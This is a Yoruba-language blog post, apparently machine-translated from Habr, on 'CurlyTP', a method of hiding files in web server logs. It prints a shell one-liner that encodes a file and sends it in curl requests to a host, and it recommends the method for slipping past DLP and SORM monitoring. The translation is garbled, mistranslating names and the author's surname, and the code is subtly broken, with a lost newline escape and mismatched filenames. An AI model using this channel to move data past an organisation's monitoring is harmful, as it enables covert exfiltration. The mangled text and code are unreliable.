ProHoster > Блог > Isakoso > Paṣipaarọ awọn ifiranṣẹ aṣiri nipasẹ awọn akọọlẹ olupin

Paṣipaarọ awọn ifiranṣẹ aṣiri nipasẹ awọn akọọlẹ olupin

Gẹgẹbi asọye Wikipedia, isubu ti o ku jẹ ohun elo iditẹ ti o ṣiṣẹ lati ṣe paṣipaarọ alaye tabi awọn ohun kan laarin awọn eniyan ti nlo ipo aṣiri kan. Ero naa ni pe eniyan ko pade - ṣugbọn wọn tun paarọ alaye lati ṣetọju aabo iṣẹ.

Ibi ipamọ ko yẹ ki o fa akiyesi. Nítorí náà, nínú ayé àìsílóníkà, wọ́n sábà máa ń lo àwọn nǹkan olóye: bíríkì tí kò wúlò nínú ògiri, ìwé ìkówèésí, tàbí ṣófo nínú igi kan.

Ọpọlọpọ fifi ẹnọ kọ nkan ati awọn irinṣẹ ailorukọ lori Intanẹẹti, ṣugbọn otitọ ti lilo awọn irinṣẹ wọnyi ṣe ifamọra akiyesi. Ni afikun, wọn le dina ni ile-iṣẹ tabi ipele ijọba. Kin ki nse?

Olùgbéejáde Ryan Flowers dabaa aṣayan ti o nifẹ - lo eyikeyi olupin ayelujara bi ibi ipamọ. Ti o ba ronu nipa rẹ, kini olupin wẹẹbu kan ṣe? Ngba awọn ibeere, gbejade awọn faili ati kọ awọn akọọlẹ. Ati pe o forukọsilẹ gbogbo awọn ibeere, ani awọn ti ko tọ!

O wa ni pe eyikeyi olupin wẹẹbu gba ọ laaye lati fipamọ fere eyikeyi ifiranṣẹ ninu akọọlẹ naa. Awọn ododo ṣe iyalẹnu bi o ṣe le lo eyi.

O funni ni aṣayan yii:

  1. Mu faili ọrọ kan (ifiranṣẹ aṣiri) ko si ṣe iṣiro hash (md5sum).
  2. A fi koodu rẹ pamọ (gzip+uuencode).
  3. A kọ si log ni lilo ibeere ti ko tọ lati mọọmọ si olupin naa.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Lati ka faili kan, o nilo lati ṣe awọn iṣẹ wọnyi ni ọna yiyipada: pinnu ati ṣii faili naa, ṣayẹwo hash (hash le jẹ gbigbe lailewu lori awọn ikanni ṣiṣi).

Awọn aaye ti wa ni rọpo pẹlu =+=ki o wa ni ko si awọn alafo ninu awọn adirẹsi. Eto naa, eyiti onkọwe pe CurlyTP, nlo fifi koodu base64, bii awọn asomọ imeeli. Ibere ​​naa ni a ṣe pẹlu ọrọ-ọrọ kan ?transfer?ki olugba le ni irọrun ri ninu awọn akọọlẹ.

Kini a rii ninu awọn akọọlẹ ninu ọran yii?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Gẹgẹbi a ti sọ tẹlẹ, lati gba ifiranṣẹ aṣiri kan o nilo lati ṣe awọn iṣẹ ṣiṣe ni ọna yiyipada:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Ilana naa rọrun lati ṣe adaṣe. Md5sum ibaamu, ati awọn akoonu ti awọn faili jerisi pe ohun gbogbo ti wa ni yiyipada o ti tọ.

Ọna naa rọrun pupọ. “Oko-ọrọ ti adaṣe yii ni lati jẹrisi pe awọn faili le gbe nipasẹ awọn ibeere wẹẹbu kekere alaiṣẹ, ati pe o ṣiṣẹ lori olupin wẹẹbu eyikeyi pẹlu awọn iforukọsilẹ ọrọ itele. Ni pataki, gbogbo olupin wẹẹbu jẹ ibi ipamọ!” Awọn ododo kọ.

Nitoribẹẹ, ọna naa ṣiṣẹ nikan ti olugba ba ni iwọle si awọn akọọlẹ olupin. Ṣugbọn iru iraye si ti pese, fun apẹẹrẹ, nipasẹ ọpọlọpọ awọn alejo gbigba.

Bawo ni lati lo?

Ryan Flowers sọ pe kii ṣe alamọja aabo alaye ati pe kii yoo ṣe akopọ atokọ ti awọn lilo ti o ṣeeṣe fun CurlyTP. Fun u, o kan jẹ ẹri ti imọran pe awọn irinṣẹ ti o mọmọ ti a ri ni gbogbo ọjọ le ṣee lo ni ọna ti kii ṣe deede.

Ni otitọ, ọna yii ni nọmba awọn anfani lori olupin miiran "fipamọ" bii Digital Òkú idasonu tabi PirateBox: ko nilo iṣeto pataki ni ẹgbẹ olupin tabi awọn ilana pataki eyikeyi - ati pe kii yoo fa ifura laarin awọn ti o ṣe atẹle ijabọ naa. Ko ṣeeṣe pe eto SORM tabi DLP kan yoo ṣe ayẹwo awọn URL fun awọn faili ọrọ fisinuirindigbindigbin.

Eyi jẹ ọkan ninu awọn ọna lati atagba awọn ifiranṣẹ nipasẹ awọn faili iṣẹ. O le ranti bi diẹ ninu awọn to ti ni ilọsiwaju ilé lo lati gbe Awọn iṣẹ Olùgbéejáde ni HTTP Awọn akọle tabi ni koodu ti awọn oju-iwe HTML.

Paṣipaarọ awọn ifiranṣẹ aṣiri nipasẹ awọn akọọlẹ olupin

Ero naa ni pe awọn olupilẹṣẹ wẹẹbu nikan yoo rii ẹyin Ọjọ ajinde Kristi yii, nitori eniyan deede kii yoo wo awọn akọle tabi koodu HTML.

Paṣipaarọ awọn ifiranṣẹ aṣiri nipasẹ awọn akọọlẹ olupin

orisun: www.habr.com

Fi ọrọìwòye kun